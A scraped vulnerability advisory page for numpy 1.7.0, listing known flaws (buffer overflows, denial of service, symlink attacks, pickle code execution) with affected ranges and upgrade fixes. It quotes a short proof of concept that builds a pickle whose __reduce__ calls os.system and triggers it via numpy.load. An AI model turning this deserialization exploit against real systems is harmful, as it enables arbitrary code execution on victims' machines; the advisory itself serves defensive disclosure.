numpy 1.7.0 vulnerabilities

Known vulnerabilities in the numpy package. This does not include vulnerabilities belonging to this package’s dependencies.

Vulnerability	Vulnerable Version
L Buffer Overflow numpy is a fundamental package needed for scientific computing with Python. Affected versions of this package are vulnerable to Buffer Overflow in the `PyArray_NewFromDescr_int` function of `ctors.c` when specifying arrays of large dimensions (over 32) from Python code. How to fix Buffer Overflow? Upgrade `numpy` to version 1.21.0rc1 or higher.	[,1.21.0rc1)
L Buffer Overflow numpy is a fundamental package needed for scientific computing with Python. Affected versions of this package are vulnerable to Buffer Overflow due to missing boundary checks in the `array_from_pyobj` function of `fortranobject.c`. This may allow an attacker to conduct Denial of Service by carefully constructing an array with negative values. How to fix Buffer Overflow? Upgrade `numpy` to version 1.22.0 or higher.	[,1.22.0)
L NULL Pointer Dereference numpy is a fundamental package needed for scientific computing with Python. Affected versions of this package are vulnerable to NULL Pointer Dereference due to missing return-value validation in the `PyArray_DescrNew` function, which may allow attackers to conduct Denial of Service attacks by repetitively creating and sort arrays. Note: This may likely only happen if application memory is already exhausted, as it requires the `newdescr` object of the `PyArray_DescrNew` to evaluate to `NULL`. How to fix NULL Pointer Dereference? Upgrade `numpy` to version 1.22.2 or higher.	[0,1.22.2)
L Denial of Service (DoS) numpy is a fundamental package needed for scientific computing with Python. Affected versions of this package are vulnerable to Denial of Service (DoS) due to an incomplete string comparison in the `numpy.core` component, which may allow attackers to fail the APIs via constructing specific string objects. How to fix Denial of Service (DoS)? Upgrade `numpy` to version 1.22.0rc1 or higher.	[,1.22.0rc1)
C Arbitrary Code Execution numpy is a fundamental package needed for scientific computing with Python. Affected versions of this package are vulnerable to Arbitrary Code Execution. It uses the pickle Python module unsafely, which allows remote attackers to execute arbitrary code via a crafted serialized object, as demonstrated by a `numpy.load` call. PoC by nanshihui: `import numpy from numpy import __version__ print __version__ import os import pickle class Test(object): def __init__(self): self.a = 1 def __reduce__(self): return (os.system,('ls',)) tmpdaa = Test() with open("a-file.pickle",'wb') as f: pickle.dump(tmpdaa,f) numpy.load('a-file.pickle')` How to fix Arbitrary Code Execution? Upgrade `numpy` to version 1.16.3 or higher.	[0,1.16.3)
M Symlink Attack numpy is a package needed for scientific computing with Python. Affected versions of this package are vulnerable to Symlink Attack. It allows local users to write to arbitrary files via a symlink attack on a temporary file. How to fix Symlink Attack? Upgrade `numpy` to version 1.8.2 or higher.	[,1.8.2)
H Denial of Service (DoS) numpy is a package for scientific computing with Python. Affected versions of this package are vulnerable to Denial of Service (DoS)due to missing input validation. An empty list or an array will stick into an infinite loop. How to fix Denial of Service (DoS)? Upgrade `numpy` to version 1.13.3 or higher.	[,1.13.3)
M SymLink Attack `numpy` is a array processing for numbers, strings, records, and objects. ' Affected versions of this package are vulnerable to Symlink attacks.	[,1.8.1)

Vulnerability

Vulnerable Version

Buffer Overflow

numpy is a fundamental package needed for scientific computing with Python.

Affected versions of this package are vulnerable to Buffer Overflow in the PyArray_NewFromDescr_int function of ctors.c when specifying arrays of large dimensions (over 32) from Python code.

How to fix Buffer Overflow?

Upgrade numpy to version 1.21.0rc1 or higher.

[,1.21.0rc1)

Buffer Overflow

numpy is a fundamental package needed for scientific computing with Python.

Affected versions of this package are vulnerable to Buffer Overflow due to missing boundary checks in the array_from_pyobj function of fortranobject.c. This may allow an attacker to conduct Denial of Service by carefully constructing an array with negative values.

How to fix Buffer Overflow?

Upgrade numpy to version 1.22.0 or higher.

[,1.22.0)

NULL Pointer Dereference

numpy is a fundamental package needed for scientific computing with Python.

Affected versions of this package are vulnerable to NULL Pointer Dereference due to missing return-value validation in the PyArray_DescrNew function, which may allow attackers to conduct Denial of Service attacks by repetitively creating and sort arrays.

Note: This may likely only happen if application memory is already exhausted, as it requires the newdescr object of the PyArray_DescrNew to evaluate to NULL.

How to fix NULL Pointer Dereference?

Upgrade numpy to version 1.22.2 or higher.

[0,1.22.2)

Denial of Service (DoS)

numpy is a fundamental package needed for scientific computing with Python.

Affected versions of this package are vulnerable to Denial of Service (DoS) due to an incomplete string comparison in the numpy.core component, which may allow attackers to fail the APIs via constructing specific string objects.

How to fix Denial of Service (DoS)?

Upgrade numpy to version 1.22.0rc1 or higher.

[,1.22.0rc1)

Arbitrary Code Execution

numpy is a fundamental package needed for scientific computing with Python.

Affected versions of this package are vulnerable to Arbitrary Code Execution. It uses the pickle Python module unsafely, which allows remote attackers to execute arbitrary code via a crafted serialized object, as demonstrated by a numpy.load call.

PoC by nanshihui:

import numpy
from numpy import __version__
print __version__
import os
import  pickle
class Test(object):
    def __init__(self):
        self.a = 1

    def __reduce__(self):
        return (os.system,('ls',))
tmpdaa = Test()
with open("a-file.pickle",'wb') as f:
    pickle.dump(tmpdaa,f)
numpy.load('a-file.pickle')

How to fix Arbitrary Code Execution?

Upgrade numpy to version 1.16.3 or higher.

[0,1.16.3)

Symlink Attack

numpy is a package needed for scientific computing with Python.

Affected versions of this package are vulnerable to Symlink Attack. It allows local users to write to arbitrary files via a symlink attack on a temporary file.

How to fix Symlink Attack?

Upgrade numpy to version 1.8.2 or higher.

[,1.8.2)

Denial of Service (DoS)

numpy is a package for scientific computing with Python.

Affected versions of this package are vulnerable to Denial of Service (DoS)due to missing input validation. An empty list or an array will stick into an infinite loop.

How to fix Denial of Service (DoS)?

Upgrade numpy to version 1.13.3 or higher.

[,1.13.3)

SymLink Attack

numpy is a array processing for numbers, strings, records, and objects. ' Affected versions of this package are vulnerable to Symlink attacks.

[,1.8.1)

numpy@1.7.0 vulnerabilities

Fundamental package for array computing in Python

latest version

latest non vulnerable version

first published

latest version published

licenses detected

Direct Vulnerabilities

How to fix?